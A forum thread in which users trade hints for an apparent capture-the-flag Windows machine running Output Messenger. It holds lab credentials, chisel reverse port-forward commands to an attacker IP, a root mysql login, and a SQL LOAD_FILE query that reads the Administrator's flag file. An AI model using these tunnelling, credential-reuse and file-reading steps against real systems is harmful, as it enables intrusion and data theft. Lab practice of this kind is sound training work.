Posts: 49
Threads: 1
Joined: Jun 2024
Sep 01, 2024, 03:45 PM
(This post was last modified: Sep 01, 2024, 03:46 PM by bmoon10.)
(Sep 01, 2024, 03:43 PM)osamy7593 Wrote: (Sep 01, 2024, 03:42 PM)09ft Wrote: (Sep 01, 2024, 03:27 PM)osamy7593 Wrote: man i'm in the chat, i already did port forward and downloaded the app and logged in as k.turner but nothing useful .. what u found?
you can get MariaDB creds, portforward and login as root, then call the root flag. that's how I did it. I didn't get root shell
Where u got mariadb creds ?
it's in C:\ProgramData\Output Messenger Server\Temp\OutputMessengerMysql.zip
(Sep 01, 2024, 03:42 PM)09ft Wrote: (Sep 01, 2024, 03:27 PM)osamy7593 Wrote: man i'm in the chat, i already did port forward and downloaded the app and logged in as k.turner but nothing useful .. what u found?
you can get MariaDB creds, portforward and login as root, then call the root flag. that's how I did it. I didn't get root shell
well it's definitely an unintended path.
Posts: 38
Threads: 1
Joined: Mar 2024
Sep 01, 2024, 04:12 PM
(This post was last modified: Sep 01, 2024, 04:13 PM by spamdegratis5.)
O.martinez credentials can be found by querying the API. You need the chatroom key (and obviously the api key, obtained after login using winrm_svc in the client) that can be found in the OM.db3 database, which can be found in the AppData folder of winrm_svc.
Posts: 124
Threads: 1
Joined: Apr 2024
ehh i'm connected as m.harris to output messenger, i see in chat with admin UserExplorer.exe - but when i can't download. did port forward with chisel and with meterpreter but it doesn't work
Posts: 41
Threads: 2
Joined: Sep 2023
(Sep 01, 2024, 04:54 PM)jsvensson Wrote: ehh i'm connected as m.harris to output messenger, i see in chat with admin UserExplorer.exe - but when i can't download. did port forward with chisel and with meterpreter but it doesn't work
portforward 14122
Posts: 124
Threads: 1
Joined: Apr 2024
(Sep 01, 2024, 05:01 PM)Unbutton8074 Wrote: (Sep 01, 2024, 04:54 PM)jsvensson Wrote: ehh i'm connected as m.harris to output messenger, i see in chat with admin UserExplorer.exe - but when i can't download. did port forward with chisel and with meterpreter but it doesn't work
portforward 14122
thanks, i should have thought that it could be related to another port
Posts: 26
Threads: 0
Joined: Apr 2024
(Sep 01, 2024, 04:54 PM)jsvensson Wrote: ehh i'm connected as m.harris to output messenger, i see in chat with admin UserExplorer.exe - but when i can't download. did port forward with chisel and with meterpreter but it doesn't work
how are u able to connect with output messenger?
I have the unix client and try to connect with:
User: k.turner
Pass: MessengerApp@Pass!
Server: 10.129.225.184
Posts: 7
Threads: 0
Joined: Aug 2024
In target
.\chisel client 10.10.16.28:14122 R:54565:127.0.0.1:14122
In my machine
chisel server --reverse --port 14122
What am I doing wrong? I also tried to forward ports using Meterpreter but it doesn't work.
Posts: 49
Threads: 1
Joined: Jun 2024
Sep 01, 2024, 05:41 PM
(This post was last modified: Sep 01, 2024, 05:46 PM by bmoon10.)
(Sep 01, 2024, 05:31 PM)grieving7 Wrote: In target
.\chisel client 10.10.16.28:14122 R:54565:127.0.0.1:14122
In my machine
chisel server --reverse --port 14122
What am I doing wrong? I also tried to forward ports using Meterpreter but it doesn't work.
from: https://support.outputmessenger.com/server-install-faq/
14121 TCP – Application
14122 TCP – File Transfer
14123 TCP – Web server for Browser Version
14124 TCP & UDP – VoIP for Voice/Video/Desktop Sharing
all the above ports have to be exposed to the attack machine, only then will outputmessenger in the attack machine function as intended
#chisel server - kali / attack machine
$ chisel server -p 9999 --reverse
#chisel client (windows)
c:\temp\chisel client 10.x.y.z:9999 R:14121:127.0.0.1:14121 R:14122:127.0.0.1:14122 R:14123:127.0.0.1:14123 R:14124:127.0.0.1:14124
Posts: 42
Threads: 2
Joined: Aug 2024
Root unintended:
1. chisel port 14406 to your machine
2. connect to mariadb
Quote:proxychains mysql -h 127.0.0.1 -P 14406 --database=outputwall -uroot -pibWijteig5
read root flag:
Quote:SELECT LOAD_FILE('C:\\Users\\Administrator\\Desktop\\root.txt') AS Result;
Posts: 41
Threads: 2
Joined: Sep 2023
(Sep 01, 2024, 04:12 PM)spamdegratis5 Wrote: O.martinez credentials can be found by querying the API. You need the chatroom key (and obviously the api key, obtained after login using winrm_svc in the client) that can be found in the OM.db3 database, which can be found in the AppData folder of winrm_svc.
those creds are working for messenger but not for host/rdp. am i missing something?